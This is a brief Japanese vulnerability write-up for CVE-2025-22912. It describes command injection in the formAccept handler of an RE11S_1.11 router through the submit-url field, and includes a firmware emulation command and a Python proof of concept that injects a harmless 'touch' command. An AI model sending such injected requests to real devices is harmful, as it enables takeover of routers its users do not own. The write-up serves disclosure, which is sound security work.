
CVE-2025-22912
Qi An Xin Tiangong Lab でのインターンシップ中に、RE11S_1.11 ルーターにコマンドインジェクションの脆弱性を発見しました。
bin ディレクトリ内の webs ファイルを解析したところ、関数 formAccept にコマンドインジェクションの脆弱性が含まれていることを発見しました。
このコマンドインジェクションは、submit-url キーの値によってトリガーされ、システムコマンドインジェクションにつながります。

firmAE でシミュレートするには、次のコマンドを使用します。
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin
poc.py ファイルの内容は次のとおりです。
import requests
url = "http://192.168.9.2/goform/formAccept"
data = {
"submit-url":"touch /tmp/xyq"
}
r = requests.post(url,data=data)
print(r.text)

実行後に /tmp/xyq ファイルが追加されていることが確認でき、攻撃が成功したことが証明されます。